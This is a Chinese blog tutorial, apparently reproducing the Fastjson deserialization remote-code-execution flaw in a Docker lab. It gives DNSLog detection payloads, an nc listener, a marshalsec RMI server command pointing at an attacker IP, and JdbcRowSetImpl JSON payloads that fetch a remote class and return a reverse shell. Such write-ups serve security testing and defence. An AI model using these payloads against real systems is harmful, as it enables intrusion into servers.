Fastjson反序列化

最新推荐文章于 2024-05-20 23:13:23 发布
最新推荐文章于 2024-05-20 23:13:23 发布
阅读量1.1k 收藏 2
点赞数 1
分类专栏: 渗透测试 文章标签: Fastjson反序列化 漏洞复现 白帽子 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37622608/article/details/109810217
版权

欢迎去我的博客查看原文:http://www.xpshuai.cn/posts/21856/

简介

fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。可以通过反序列化导致远程命令执行。

漏洞检测方法

DNSLog回显

下面有多个请求,分别放到请求数据包部分(可能某个不适用, 多试几个),通过构造DNS解析来判断是否是Fastjson,Fastjson在解析下面这些Payload时会取解析val的值,从而可以在dnslog接收到回显以此判断是不是Fastjson

{"a":{"@type":"java.net.Inet4Address","val":"xxx.dnslog.cn"}}

{"@type":"java.net.Inet4Address","val":"xxx.dnslog.cn"}
{"@type":"java.net.Inet6Address","val":"xxx.dnslog.cn"}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"xxx.dnslog.cn"}}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"xxx.dnslog.cn"}}""}
{{"@type":"java.net.URL","val":"xxx.dnslog.cn"}:"aaa"}
Set[{"@type":"java.net.URL","val":"xxx.dnslog.cn"}]
Set[{"@type":"java.net.URL","val":"xxx.dnslog.cn"}
{{"@type":"java.net.URL","val":"xxx.dnslog.cn"}:0

增加key

Java语言中常用的Json处理主要是Fastjson和Jackson,相对而言,Jackson比较严格,强制Key和JavaBean属性对齐,只能少Key不能多Key,所以可以通过增加一个Key看响应包会不会报错来判断。

利用复现

这里用的docker环境

在这里插入图片描述

1.查看数据包,可以用上面的漏洞检测的方法来判断

在这里插入图片描述

2.vps用nc监听端口8888

nc -lvvp 8888

EXP地址:https://github.com/CaijiOrz/fastjson-1.2.47-RCE

3.修改exp中反弹shell的服务器地址和为我们的

在这里插入图片描述

4.使用javac进行编译,然后会生成一个Exploit.class文件

javac Exploit.java

在这里插入图片描述

5.在Exploit.class的目录下开启python的简单http服务,相当于访问就能下载

python -m SimpleHTTPServer 8080

在这里插入图片描述

6.执行下面的命令开启RMI/LDAP服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.43.102:8080/#Exploit" 9999	#8080是前面SimpleHTTPServer的端口

在这里插入图片描述

7.构造exp请求包

# 1.2.47以下版本
{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.43.102:9999/Exploit",
        "autoCommit":true
    }
}







# 1.2.24以下版本
{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://同上类文件地址:9999/TouchFile",
        "autoCommit":true
    }
}

8.构造好的请求包发送如下,注意:Content-type格式要json,并且是post请求

Content-type: application/json

在这里插入图片描述

9.接收到反弹回来的shell

在这里插入图片描述

参考:https://www.naraku.cn/posts/86.html

www.xpshuai.cn
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Fastjson反序列化漏洞复现(实战案例)
1
04-19 1万+
漏洞介绍 FastJson解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。 通俗理解就是:漏洞利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据
通过dnslog探测fastjson的几种方法
Adminxe的博客
05-04 7721
0x01 背景 在渗透测试中遇到json数据一般都会测试下有没有反序列化。然而json库有fastjson,jackson,gson等等。怎么判断后端不是fastjson呢?这就需要构造特定的payload了。 昨天翻看fastjson源码时发现了一些可以构造dns解析且没在黑名单当中的类,于是顺手给官方提了下Issue。有趣的是后续的师傅们讨论还挺热闹的,我也在这次讨论中学习了很多。这篇...
Fastjson在实战中的检测与利用
why811的博客
10-08 1799
参考:https://github.com/alibaba/fastjson/issues/3077java.net.InetAddress这个gadget在1.2.49禁止了。如果上面这个poc可以出dnslog说明很大概率可以rce。如果以上这些poc可以出dnslog,则可以说明后端百分百是fastjson。最近发现有个容易被人弄错的地方,就是fastjson的payload。网上的Payload,发现有的目标可以成功,有的目标不能成功,这是为什么?
fastjson反序列化漏洞原理
最新发布
m0_73649671的博客
05-20 1016
fastjson反序列化漏洞原理
FastJson反序列化分析
m0_49443776的博客
11-19 4111
本文主要针对FastJson反序列化过程进行详细分析,以及poc案例分析,留作学习笔记,以供日后复习
Fastjson探测简介
Fly_鹏程万里
05-08 4528
Fastjson探测作用 在渗透测试中遇到json数据一般都会测试下有没有反序列化,然而JSON库有Fastjson,JackJson,Gson等等,那么怎么判断后端不是Fastjson呢?可以构造特定的payload来进行探测分析,下面介绍一些常用的payload,且这些Payload可以在AutoType关闭的情况下进行测试~~~ Fastjson探测方法 方法一:java.net.Inet4Address 请求方式 {"@type":"java.net.Inet4Address","val
域名解析过程_在Java反序列化过程中通过java.net.URL触发域名解析请求
weixin_39760206的博客
12-19 422
标题: 在Java反序列化过程中通过java.net.URL触发域名解析请求☆前言☆Serializable接口详解9)URLDNS9.1)HashMapURLDNS.java9.2)简化版调用关系9.3)ysoserial.payloads.URLDNSFastjson10)Fastjson反序列化过程中触...
springmvc fastjson 反序列化时间格式化方法(推荐)
10-20
在Spring MVC中,Fastjson是一个常用的JSON库,用于序列化和反序列化Java对象。当我们在处理日期时间字段时,可能会遇到反序列化时日期格式不一致的问题,导致默认显示为时间戳。本文将详细介绍两种解决Spring MVC中...
FastjsonScan:一个简单的Fastjson反序列化检测burp插件
04-13
FastjsonScan一个简单的Fastjson反序列化检测burp插件我在挖洞的时候看到一些json请求总是想要检测一下有没有Fastjson反序列化问题,本可以直接写一个脚本来跑或者搭配其他被动扫描器来验证,但是我太懒了,先不说...
FastJson反序列化
06-17
[{"listA":[{"id":"fds","name":"张三"},{"id":"fds","name":"李四"}],"test":"432"}, {"listA":[{"id":"fds","name":"张三"},{"id":"fds","name":"李四"}],...数组里面封装数组的反序列化方法,通过两个bean,进行封装
fastjson反序列化利用
09-29
“本工具仅能在取得足够合法授权的企业安全建设中使用,在使用本工具过程中,您应确保自己所有行为符合当地的法律法规。 如您在使用本工具的过程中存在任何非法行为,您将自行承担所有后果,本工具所有开发者和所有...
SpringBoot Redis配置Fastjson进行序列化和反序列化实现
10-16
这里,我们为`value`和`hashValue`设置了Fastjson序列化器,而`key`和`hashKey`使用了默认的`StringRedisSerializer`,因为Redis的key通常为字符串。 **3. 示例实体类** 为了演示序列化和反序列化的效果,我们可以...
Fastjson利用笔记
热门推荐
LiBai'S BLOG
06-08 1万+
Fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。具有执行效率高的特点,应用范围广泛。Fastjson RCE关键函数:DefaultJSONParser. parseObject() 解析传入的 json 字符串提取不同的 key 进行后续的处理TypeUtils. loadClass() 根据传入的类名,生成类的实例JavaBeanDeserializer. Deserialz
序列化探索之四 - Fastjson
zou8944的博客
11-01 1601
开局一吐槽,Fastjson的文档,比Jackson还差。Jackson只是位置不明确,如果安下心来看看,还是能够理清楚的。而Fastjson是位置不明确,如果安下心来看看,还会发现,它的文档零零散散,中英文混杂,找不准主线在哪儿。我记得知乎上有个问题,fastjson这么快老外为啥还是热衷 jackson?,就这文档,让老外用个啥。 不过看还是要看的,毕竟它是目前主流序列化框架之一。老样子,我们还是从基本使用方法和原理分析两部分着手。 能力 Fastjson仅仅针对json,尚不支持其它任何格式,也没有看
Fastjson漏洞的识别与DNSlog回显
tpaer的博客
09-02 4810
Fastjson RCE漏洞实战POC探测方式
Java反序列化Fastjson基础
..
01-06 7461
最近摆烂了很久,来学习一下fastjson Fastjson 是 Alibaba 开发的 Java 语言编写的高性能 JSON 库,用于将数据在 JSON 和 Java Object 之间互相转换。提供两个主要接口来分别实现序列化和反序列化操作。JSON.toJSONString 将 Java 对象转换为 json 对象,序列化的过程。JSON.parseObject/JSON.parse 将 json 对象重新变回 Java 对象;反序列化的过程所以可以简单的把 json 理解成是一个字符串。
fastjson jackson json反序列化字段设置别名
路过君的博客
08-24 639
【代码】fastjson jackson json反序列化字段设置别名。
Fastjson 反序列化替换名称
neabea2016的博客
12-24 2302
后台传过来的字段有可能是result,有可能是resultList FastJson进行转换的时候统一转换为resultList 注意:必须写在set get方法中 public class Bean<T> { public List<T> resultList; @JSONField(name = "resultList",alternateNames = "result") public List<T> getResultList() {
fastjson反序列化
07-27
Fastjson中,反序列化就是将JSON字符串转换为Java对象的过程。 要进行Fastjson反序列化,首先需要将JSON字符串作为输入,然后使用Fastjson提供的API将其转换为Java对象。以下是一个简单的示例代码: ```java ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值